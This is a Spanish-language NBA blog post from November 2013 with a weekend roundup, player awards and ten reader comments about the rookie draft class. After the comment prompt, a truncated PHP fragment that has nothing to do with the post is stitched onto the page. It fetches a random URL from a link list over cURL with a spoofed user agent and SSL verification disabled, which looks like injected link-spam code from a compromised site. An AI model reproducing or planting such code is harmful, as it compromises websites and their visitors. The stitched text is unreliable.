Informe del fin de semana: La embestida

18 de November de 2013 por TheDeerHunter

No hay mal ni bien que por cien años dure. Concretamente la racha inmaculada de los Pacers había alcanzado los 9 partidos hasta la visita a Chicago el sábado. Las míticas notas de Sirius, de The Alan Parsons Project presagiaban que algo importante podía suceder. Sin alcanzar aún el tono óptimo, los sistemas de Thibbodeau lograban anular las principales bazas de los Pacers. El día anterior, sin Rose, ya habían dejado a los Raptors en 80 puntos. A pesar de todas las dudas generadas los Bulls ya se encaraman a la tercera posición de un Este que aún lideran cómodamente los Pacers con 9-1. El día anterior habían destrozado a Milwaukee con Roy Hibbert rozando el triple doble gracias a sus 8 tapones.

Los otros grandes triunfadores del fin de semana han sido los Blazers:

“Fantástico Portland,de forma sigilosa está muy arriba en la clasificación,aprovechando un calendario algo benévolo aunque con victorias de prestigio como las que se llevaron del Oracle o del Staples derrotando a Clippers. Hoy una más,se han deshecho en la prórroga de los Raptors para un balance de 8-2.” Ruxixón.

Efectivamente, se paseaban por Boston el viernes y anoche lograban prevalecer ante el empuje de Rudy “yomeloguiso” Gay y los Raptors, consolidando una espectacular 2ª plaza. Los Raptors mantienen plaza de playoffs en su conferencia a pesar de estar por debajo del 40% de victorias, que les pondría únicamente por delante de Kings y Jazz en el Oeste, igualados con unos Celtics que se encuentran en una nueva mini-crisis, tras haber caído también contra Minnesota.

Miami y LeBron siguen a la suya. Sufrieron mucho ante Dallas y apenas nada ante unos Bobcats en zona de playoffs. Éstos cumplieron su promedio con su victoria en Cleveland. Mientras que los Sixers se desinflan (incluido  palizón en New Orleans con Jrue Holiday, Ryan Anderson y Anthony Davis ejerciendo de Big Three), los Hawks se posicionan en la parte alta de la clasificación. Victorias ante los propios Sixers, con el partido de su vida de Jeff Teague, y ante los Knicks que se hunden aún más. También lo hacen los Wizards tras su derrota ante Cavs. 

No les sirven ni las dos victorias conseguidas ante Lakers y Kings a los Grizzlies para alcanzar zona noble. Ambas con la versión que queremos ver de Zach Randolph. Los Lakers se llevaron un gran triunfo anoche ante Detroit, con Jordan Hill estelar. Los Pistons habían ganado también en Sacramento el viernes.

“Joe Johnson salvó increíblemente la ropa de los Nets” Esteban.

Se refería el compañero a la inverosímil victoria en Phoenix que aún no se deben creer ni ellos. Los Suns, en mini-crisis, salen de playoffs, aunque la alegría en los Nets no duró mucho tras su derrota ante Clippers, imbatidos en el Staples.

En el Oeste no hubo grandes cambios más. Los Jazz perdieron abultadamente contra Spurs y Warriors, que completan la parte alta del cuadro. Thunder cumplió el expediente ante Bucks. El “hack a Howard” no les sirvió esta vez a los Nuggets, que había ganado brillantemente a los Wolves el día anterior. Los Mavs se cuelan en zona de playoffs con su victoria en Orlando.

PREMIOS

MVP: Heat y Grizzlies se han llevado los 2 partidos que disputaban este fin de semana en gran medida por culpa de Lebron James y Marc Gasol, respectivamente. Lebron ha anotado 34’5 puntos de media con un increible 75% de acierto en tiros de campo mientras que el español ha flirteado con el triple doble en ambos partidos. 18-8-8 el viernes ante los Lakers y 19-8-9 ayer, ante los Kings. Los Hawks también han conseguido dos victorias con Jeff Teague como protagonista, sobretodo en su partido del viernes en el que consiguió 33 puntos  y 10 asistencias. Blake Griffin y Serge Ibaka cuajaron grandes actuaciones en los únicos partidos que han jugado estos días. El de los Clippers mantuvo su buen estado de forma el sábado ante los Nets (30 puntos y 12 rebotes) y el de los Thunder se fue a los 15 puntos, 20 rebotes y 4 tapones contra los Bucks. Tampoco quiero dejar de destacar los 8 tapones que puso Anthony Davis el mismo sábado.

Sorpresa: Los Lakers están de enhorabuena con el nivel de Jordan Hill y Steve Blake. La intensidad del primero le permitió llegar ayer a los 24 puntos y 17 rebotes y el base ha cuajado un fin de semana fabuloso con un 9-7-10 el viernes ante los Grizzlies y 9 puntos, 16 asistencias y 4 robos ayer ante los Pistons. Jared Sullinger anotó 28 puntos el viernes, lástima que al día siguiente se quedara en 3. Demarre Carroll alcanzó los 21 puntos también el viernes con un 5 de 8 en triples. Su compañero Shelvin Mack aprovechó los minutos que le dieron el sábado ante los Knicks para repartir 12 asistencias.

Esfuerzo en vano: Ha habido varios jugadores que han rendido a gran nivel pero que no han tenido el premio de conseguir todas las victorias en juego. Ty Lawson repartió 17 asistencias ante los Rockets y además consiguió 28 puntos; Kyrie Irving se fue a los 41 puntos en su partido contra los Wizards pero el día anterior había caído frente los Bobcats a pesar de sus 18 puntos y 10 asistencias; Roy Hibbert puso 8 pinchos de merluza el viernes ante los Bucks que complementó con 24 puntos y 10 rebotes pero cayó el sábado ante los Bulls; Los Jazz perdieron los 2 partidos en juego a pesar de Derrick Favors, que el viernes se disparó hasta los 20 puntos, 18 rebotes, 3 tapones y 3 robos y el sábado consiguió 17 puntos y 7 rebotes; Josh Smith condujo a los Pistons a la victoria el viernes y se quedó muy cerca de conseguir un 5×5. Se fue a casa con 21 puntos, 8 rebotes, 7 asistencias, 5 robos y 4 tapones.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. franitis dice:
    #1

    Deer, no has puesto el apartado “Decepción”, donde quería ver a Jeff Green… Un aspirante a algo (ya me da igual si es estrella, contender o sexto hombre…) no se puede ir de un partido (VS Wolves) con 2 puntos (2/2 en tiros libres) y 0/6 en tiros de campo, 0/2 en triples, eso es una VER GÜEN ZA para un tío con su proyección.

    Las cosas buenas; el desarrollo de Sullinger (26 ptos. 8 rebotes VS Blazers) y la liberación de Bradley (27 ptos. VS Wolves), así como los minutos en cancha de Olynyk, Faverani (9 ptos. 14 rebotes VS Wolves) y Pressey. La vuelta de Brooks (8 ptos. VS Wolves) también me alegra; al menos para valorar su potencial para el futuro. Por lo demás; derrotas asumidas viendo la trayectoria de los rivales (Bobcats, Blazers, Wolves), aunque duele más la de Bobcats, que se podía haber hecho mucho, pero que mucho más.

      Citar

  2. TheDeerHunter dice:
    #2

    Ningún artículo queda completo sin vuestra aportación… así que apuntado queda.

      Citar

  3. Esteban dice:
    #3

    de a poco se empiezan a ir decidiendo las cosas en las conferencias

    ya tenemos algunos equipos que esta claro que no irán a PO, en el oeste Uhta y Sacramento, y si cae un poco los Suns, después todos los demás equipos están buscando clasificarse; hoy sacando a esos 3 equipos, los de mas abajo en la conferencia serian los Lkaers y Los pelicans, denver y Menphis apenas por encima de ellos

    que lucha habrá en esa conferencia

    el este es un lio mayor, esta claro que los Bucks son últimos y no dejaran ese lugar en poco tiempo, pero después los 14 equipos restantes parecen tener la idea de ir a los PO, a menos que tanto los celtics, magic y los 76ers empiezan a perder, va a haber una lucha terrible por PO aquí tambien

      Citar

  4. Esteban dice:
    #4

    un tema para la discusion, por lo visto hasta AQUI, esta es la peor camada de rookies de los que recuerdan?

      Citar

  5. Schize dice:
    #5

    La verdad es que no hay mucho donde sacar. Alguno que apuntaban como Len o incluso Bennett son prácticamente un 0 a la izquierda, de Oladipo se esperaba más (hay que darle tiempo, claro está, pero después de la Summer League había emocionado) y a ver a Carter-Williams cuanto le dura… Pero bueno, hay destellos también de gente como Olynyk, Plumlee, Faverani, Zeller y alguno más que pueden evolucionar. Y Noel, a saber como llega

      Citar

  6. TheDeerHunter dice:
    #6

    A Len aún no se le ha visto apenas tras su operación.

      Citar

  7. Denise dice:
    #7

    Esteban:
    un tema para la discusion, por lo visto hasta AQUI, esta es la peor camada de rookies de los que recuerdan?

    Bueno, ya decian los analistas que el Draft era malo pero creo que hay que tener paciencia, nadie ha dicho que alguno de éstos rookies fuesen a convertirse en jugadores franquicia de la noche a la mañana (quizas solo Oladipo tras la SL y apurando mucho)
    Ademas, de entre el top 10 del Draft, hay 4 (Porter, Noel, Burke y McCollum) que aun no han jugado, y de los 6 restantes hay 2 (Len y Bennet) que me parecen unos paquetes desde el primer video que ví de ellos, Bennet aunque esté reventado fisicamente tiene algo de calidad, pero el ucraniano solo tiene altura, por lo demas es una estafa de jugador.

    Después te encuentras sorpresas positivas como Nate Wolters (38 del Draft) que lo está haciendo muy bien en Bucks a pesar de la pinta de blanquito paquete que tiene (me recuerda a Petteri Koponen).

    Pero en uno de los que mas confío es en Rudy Gobert, un autentico bicharraco fisico, ahora mismo es un tirillas sin fundamentos, musculos ni calidad alguna y aun así se hincha de coger rebotes cuando le dan continuidad. Dentro de un par de años cuando consiga musculo y trabaje sus movimientos ofensivos, será un pivot a tener muy en cuenta

      Citar

  8. disconimahoni dice:
    #8

    pues igual es de los drafts donde mas minutos en general estan jugando los rookies
    estaba claro que no iba a haber ninguna superestrella, aunque aun nos podemos llevar alguna sorpresa, pero eso de que era un draft muy malo para mi era una estafa, un año mas ni los analistas saben comko quedaran los jugadores.

    aun no han debutado muchos llamados a ser importantes, como mcollum, noel, burke, porter por ej.

    os olvidais tambien de steven adams que puede ser un jugador muy importante para los proximos años

    en resumen me parece un draft bastante mejor de lo qu elo ponian, incluso de momento mejor que otros muchos drafts que los ponian de excelentes.

      Citar

  9. The wolf dice:
    #9

    LeBron James y Blake Griffin, Jugadores de la Semana

      Citar

  10. Blade Petrovic dice:
    #10

    El peor Draft de la historia, es sin niguna duda el del 2000. Solo un buen jugador ha salido de ese draft, Michael Redd, y el otro buen jugador es Kenyon Martin y Jamal Crawford. Sino me equivoco tres pesimos All-Stars en total…..Paquetes como Swift, Miles… Para mí el por de la historia

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>